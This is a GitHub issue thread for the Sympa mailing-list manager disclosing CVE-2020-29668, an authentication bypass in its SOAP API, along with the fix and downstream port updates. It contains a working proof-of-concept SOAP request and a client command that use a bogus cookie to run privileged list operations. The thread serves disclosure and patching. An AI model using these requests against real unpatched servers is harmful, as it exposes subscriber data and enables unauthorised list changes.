[CVE-2020-29668] Unauthorised full access via SOAP API due to illegal cookie #1041

Closed
balert opened this issue Nov 24, 2020 · 5 comments · Fixed by #1044
balert commented Nov 24, 2020

Version

v6.2.56-1.el7 on Centos 7.8.2003

Installation method

Centos package

Expected behavior

permission denied

Actual behavior

error message and action actually executed anyways.

Additional information

In our setup we have a problem with incorrect cookies via the SOAP API of sympa.
If the SOAP request contains a correct cookie everything works as expected -> request executed
If the SOAP request contains a correct but outdated cookie, everything works as expected -> request correctly denied.

If the SOAP request contains an arbitrary string as cookie (e.g. "asdkjasdljkahsdlkjh"), SOAP replies with an error ("Undefined session ID in cookie") but STILL executes every request we make. By this we can add email addresses to lists without authentication; any operation we tried was still successful.

We could hotfix the problem by inserting a die(); command into /usr/share/sympa/lib/Sympa/WWW/Session.pm:129 like this:

    my $session_id = _cookie2id($cookie);
    unless ($session_id) {
        $log->syslog('info', 'Undefined session ID in cookie "%s"', $cookie);
        die('nothing');
        return undef;
    }

ikedas commented Nov 25, 2020

Hi @balert, could you please show what you did, such as detailed commands you executed?

@ikedas ikedas added the bug label Nov 25, 2020

balert commented Nov 26, 2020

We sent a SOAP request like this:

    <soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:urn="urn:sympasoap" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">
       <soapenv:Header/>
       <soapenv:Body>
          <urn:authenticateAndRun soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
             <email xsi:type="xsd:string">mail@example.org</email>
             <cookie xsi:type="xsd:string">randomstring</cookie>
             <service xsi:type="xsd:string">review</service>
             <parameters xsi:type="wsdl:ArrayOfString" soapenc:arrayType="xsd:string[]" xmlns:wsdl="https://lists.example.org/sympa/wsdl">
                <item>list@example.org</item>
             </parameters>
          </urn:authenticateAndRun>
       </soapenv:Body>
    </soapenv:Envelope>

@racke racke added the security label Nov 26, 2020

racke commented Nov 26, 2020

If that is true it would be a big hole. I'm going to try to reproduce it.


racke commented Nov 27, 2020

I can confirm the problem. You need to know the listname and the email that is allowed to see the subscribers (e.g. the owner of the list).

Reproduce that with the client test script:


    /usr/local/sympa/bin/sympa_soap_client.pl \
        --soap_url=https://lists.example.com/sympasoap \
        --service=review \
        --service_parameters=demo-list \
        --user_email=demo@cart.pm \
        --session_id=nevairbe


@ikedas ikedas added the ready (A PR is waiting to be merged. Close to be solved) label Dec 1, 2020
@ikedas ikedas added this to the 6.2.60 milestone Dec 1, 2020
ikedas added a commit that referenced this issue Dec 7, 2020
Properly check email and session id in authenticateAndRun SOAP call (#1041)
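
The behaviour reported in this issue (the session lookup fails and is logged, yet the requested service still runs) next to a fail-closed version, as a self-contained Perl model. This is an added example, not Sympa's code or the change merged for this issue; the session table, `load_session`, `run_service` and both `authenticate_and_run_*` functions are hypothetical, and binding the session to the request's email is an assumption based on the commit title above.

```perl
#!/usr/bin/perl
# Simplified model of the fail-open flow reported in this issue.
# Every name here is hypothetical; this is not Sympa's code.
use strict;
use warnings;

# Constructed session table: session id => email that owns it.
my %SESSIONS = ('0123456789abcd' => 'owner@example.org');

# Returns a session record, or nothing when the cookie maps to no session.
sub load_session {
    my ($cookie) = @_;
    return unless defined $cookie && exists $SESSIONS{$cookie};
    return {id => $cookie, email => $SESSIONS{$cookie}};
}

sub run_service {
    my ($email, $service, @params) = @_;
    return "executed $service(@params) as $email";
}

# Fail-open: the failed lookup is logged, then the call is dispatched
# anyway, trusting the email taken from the request.
sub authenticate_and_run_open {
    my ($email, $cookie, $service, @params) = @_;
    my $session = load_session($cookie);
    warn qq{Undefined session ID in cookie "$cookie"\n} unless $session;
    return run_service($email, $service, @params);
}

# Fail-closed: no session, or a session owned by another address, ends
# the call before any service code runs (assumed binding of email to session).
sub authenticate_and_run_closed {
    my ($email, $cookie, $service, @params) = @_;
    my $session = load_session($cookie)
        or die "Authentication failed: no valid session\n";
    die "Authentication failed: session/email mismatch\n"
        unless lc($session->{email}) eq lc($email);
    return run_service($session->{email}, $service, @params);
}

# Same call with a bogus and then a valid cookie (constructed values).
for my $cookie ('randomstring', '0123456789abcd') {
    my @req = ('owner@example.org', $cookie, 'review', 'list@example.org');
    my $open   = authenticate_and_run_open(@req);
    my $closed = eval { authenticate_and_run_closed(@req) } // "denied: $@";
    chomp $closed;
    print "cookie=$cookie\n  fail-open:   $open\n  fail-closed: $closed\n";
}
```
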

carnil commented Dec 10, 2020

This issue has been assigned CVE-2020-29668.

@ikedas ikedas changed the title from "Unauthorised full access via SOAP API due to illegal cookie" to "[CVE-2020-29668Unauthorised full access via SOAP API due to illegal cookie" Dec 11, 2020
@ikedas ikedas changed the title from "[CVE-2020-29668Unauthorised full access via SOAP API due to illegal cookie" to "[CVE-2020-29668] Unauthorised full access via SOAP API due to illegal cookie" Dec 11, 2020
@ikedas ikedas pinned this issue Dec 12, 2020
uqs pushed a commit to freebsd/freebsd-ports that referenced this issue Jan 6, 2021
- fix SOAP interface vulnerability
  sympa-community/sympa#1041

PR:		252464
Submitted by:	geoffroy desvernay <dgeo@centrale-marseille.fr> (maintainer)
MFH:		2021Q1
Relnotes:	https://github.com/sympa-community/sympa/releases/tag/6.2.60
Security:	CVE-2020-29668


git-svn-id: svn+ssh://svn.freebsd.org/ports/head@560539 35697150-7ecd-e111-bb59-0022644237b5
uqs pushed a commit to freebsd/freebsd-ports that referenced this issue Jan 6, 2021
mail/sympa: update 6.2.58 -> 6.2.60, security update CVE-2020-29668

- fix SOAP interface vulnerability
  sympa-community/sympa#1041

PR:		252464
Submitted by:	geoffroy desvernay <dgeo@centrale-marseille.fr> (maintainer)
Relnotes:	https://github.com/sympa-community/sympa/releases/tag/6.2.60
Security:	CVE-2020-29668
Jehops pushed a commit to Jehops/freebsd-ports-legacy that referenced this issue Jan 6, 2021
uqs pushed a commit to freebsd/freebsd-ports that referenced this issue Apr 1, 2021
@ikedas ikedas unpinned this issue Apr 19, 2021
@ikedas ikedas removed the ready (A PR is waiting to be merged. Close to be solved) label Jul 6, 2021